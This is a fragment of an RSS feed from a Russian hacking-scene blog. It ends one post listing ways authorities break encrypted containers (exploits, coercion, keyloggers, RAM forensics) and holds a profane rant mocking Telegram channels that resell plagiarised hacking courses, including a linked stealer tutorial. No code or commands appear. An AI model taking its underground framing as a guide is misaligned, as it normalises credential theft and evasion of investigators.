  <p>Ну опять же, Вася не глуп, и он поставил просто нереально сложный пароль, как спец.службы смогут добыть ключ к крипто-контейнерам?</p>
  <p>Лови сразу несколько вариантов:</p>
  <ol>
    <li>Взлом криптоконтейнера через уязвимость алгоритма или ПО</li>
    <li>Терморектальный криптоанализ</li>
    <li>Получение доступа с помощью трояна или кейлоггера</li>
    <li>Криминалистический анализ оперативной памяти</li>
    <li>Взлом криптоконтейнера при помощи запасного ключа</li>
  </ol>
  <p>Подробнее тут: <strong><a href="https://book.cyberyozh.com/ru/sposobyi-vzloma-kriptokontejnerov/" target="_blank">Способы взлома криптоконтейнеров</a></strong></p>
  <p></p>
  <p></p>
  <p><strong>Заключение.</strong></p>
  <p>Думал ли ты когда-нибудь, что такое настоящая, 100%-ная анонимность?</p>
  <p>Вот и я нет, а знаешь почему? Потому-что её не существует. Тем более в нынешнее время, когда человек с форума продаёт &quot;МЕГА-СКРЫТЫЕ ДАТА-ЦЕНТРЫ В ЛИВАНЕ&quot;, а на деле выходит, что все сервера находятся в Одесском подвале.. Ты же слышал эту историю?)</p>
  <p>Это будет одна из статей, в которых я расскажу, о твоих новых страхах, и сделаю тебе параноиком (это кстати, в нашей сфере, не так уж и плохо).</p>
  <p>Сегодня показал, как тебя найдут, дальше расскажу, что будет, когда к тебе постучат в дверь. На этом всё, желаю удачи тебе, <em>аноним....</em> (ахахахах, аноним, ладно, до встречи, скрип-кидос))</p>

]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@exploit_dar/SyGIFocUH</guid><link>https://teletype.in/@exploit_dar/SyGIFocUH?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=exploit_dar</link><comments>https://teletype.in/@exploit_dar/SyGIFocUH?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=exploit_dar#comments</comments><dc:creator>exploit_dar</dc:creator><title>Я хакер, купи обучение.</title><pubDate>Sat, 14 Sep 2019 17:54:18 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/fc/fc059a03-12da-4d99-b2ff-96dc233455b9.png"></media:content><description><![CDATA[<img src="https://teletype.in/files/33/33d1752f-3d27-4ff5-8318-24d7925f2293.png"></img>Привет, псы, сегодня мы поговорим о таком явлении, как продажа обучения по хакингу в телеграме. Усаживайся поудобней, приготовь салфетки и крем для рук, поехали!]]></description><content:encoded><![CDATA[
  <p>Привет, псы, сегодня мы поговорим о таком явлении, как продажа обучения по хакингу в телеграме. Усаживайся поудобней, приготовь салфетки и крем для рук, поехали!</p>
  <p><strong>! ALERT ! Слишком много мата, плоских шуток, и дыркнета.</strong></p>
  <figure class="m_original">
    <img src="https://teletype.in/files/33/33d1752f-3d27-4ff5-8318-24d7925f2293.png" width="1023" />
  </figure>
  <h3>Dark Angel -- История одного какера.. </h3>
  <p>Начнём мы с такого существа, который именует себя как Тёмный Ангел. Если просмотреть все первые посты с этого канала, то сразу поймём - очередняра-копипастер, мамкин даркнетчик, повествующий детям о том, как &quot;Как обойти ограничение прослушивания музыки в ВКонтакте&quot; или &quot;Как бесплатно и эффективно раскрутить instagram&quot;</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/8b/8bbafd8f-7cb1-4f4c-8f5b-ac41d563174d.png" width="1122" />
    <figcaption>Не, ну это точно контент для тру-хакеров.</figcaption>
  </figure>
  <p>Всё это дерьмо продолжалось до этого поста:</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/c1/c15a3be3-f449-4fc6-9506-c4c083ef7959.png" width="424" />
  </figure>
  <p>QUE 1SC - хакер широго профиля!11! Всмысле не слышал? Может ты и про DarkAngela не знаешь? Мммм, ясно, не шаришь, я на приватных форумах сижу в дыркнете, через тор, без ява... жава... javascript&#x27;a!!111! </p>
  <pre>Постирония уровня: Админ D$</pre>
  <figure class="m_original">
    <img src="https://teletype.in/files/0c/0ca9da05-c167-47b9-89a7-6b52f4e51bf2.png" width="1241" />
    <figcaption>Локальные шутки из чата :)</figcaption>
  </figure>
  <figure class="m_original">
    <img src="https://teletype.in/files/44/44e45a95-4d31-47dc-9016-e3b57bf7a3e7.png" width="461" />
  </figure>
  <p>Мы с Вами перешагнем эту черту - от копипастных схем... И начнём постить копипастные/рерайтные статьи, но про копипасты чуть позже...</p>
  <p>Ну а теперь поговорим про биполярочку нашего коекакера</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/cb/cbb8f5f8-6958-4ae8-ae8b-a494bab55417.png" width="761" />
    <figcaption>ДО</figcaption>
  </figure>
  <figure class="m_original">
    <img src="https://teletype.in/files/0b/0b128b00-9fb5-4dca-8c5b-5a9841c0bea7.png" width="639" />
    <figcaption>ПОСЛЕ</figcaption>
  </figure>
  <p>Что касательно обучения, это просто слив курса от Plastik&#x27;a (Press F, за пластика, <em>привязывайте блять доп. аккаунты к каналу</em>). </p>
  <p>Университет 3,0 УЛЬТРА ОБНОВЛЕНИЕ (хуй там)</p>
  <p>Просто давайте сравним, обучение слитое мной (<em>точнее моим подписчиком)</em>)  и дополнение от Ангела:</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/3d/3de0e3f9-2c2b-41bc-a815-1e7403214978.png" width="850" />
    <figcaption>Слитое мной..</figcaption>
  </figure>
  <figure class="m_original">
    <img src="https://teletype.in/files/5e/5e298db6-aec4-46df-ba8e-67be15da731d.png" width="745" />
    <figcaption>Дополнение от Ангела..</figcaption>
  </figure>
  <p>Ну и как, будем покупать обучение, где нам расскажут о том, <a href="https://teletype.in/@exploit_dar/rkFls0fIV" target="_blank">как создать стиллер на питоне</a>, или ещё хуже, ддосить через LOIC, это даже блять не шутки, всё действительно настолько хуёво, что просто пиздец:</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/37/37b436af-f1d6-4af9-86ba-2bfa9b0e4ad4.png" width="1113" />
  </figure>
  <p>Ну и как, папищике Hacker Place&#x27;a и Dark Angel&#x27;a, как вам такое? А? До сих пор думаете, что эти статьи пишет админ-хукер? НЕТ! эти каналы просто проект для выкачивания из людей денег, который, к сожалению, ещё жив, и будет жить ещё долго, дураков хватает всегда.</p>
  <p>Давайте взглянем на авторские статьи, которыми нас кормит наши админы:</p>
  <figure class="m_original">
    <img src="https://teletype.in/files/fc/fc8bde81-a548-4e87-8de4-949944780cd1.png" width="472" />
    <figcaption>Пропущенная по кругу статья с хакера.</figcaption>
  </figure>
  <figure class="m_original">
    <img src="https://teletype.in/files/84/840a5f69-afcd-4198-a48e-e3cf377fcc34.png" width="489" />
    <figcaption>Ахуеная статья, жаль что моя конечно.</figcaption>
  </figure>
  <figure class="m_original">
    <img src="https://teletype.in/files/ff/ff20d35c-cf58-4d97-9712-29729b68957b.png" width="539" />
    <figcaption>Ну и ещё одна.</figcaption>
  </figure>
  <figure class="m_original">
    <img src="https://teletype.in/files/16/1679a917-e1d3-46e6-968d-820395c9e436.png" width="455" />
  </figure>
  <figure class="m_original">
    <img src="https://teletype.in/files/72/72f20152-5671-4137-a19a-6bb615146212.png" width="490" />
  </figure>
  <p>...</p>
  <p></p>
  <p>От слова Dark меня уже тошнит, скоро я изменю всё, оставя тематику, пора выебать телеграм, готовьтесь псы, стая выходит в свет. </p>
  <p></p>
  <pre>революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция, революция иди спать, заебал, революция, ре, революция, революция,</pre>

]]></content:encoded></item></channel></rss>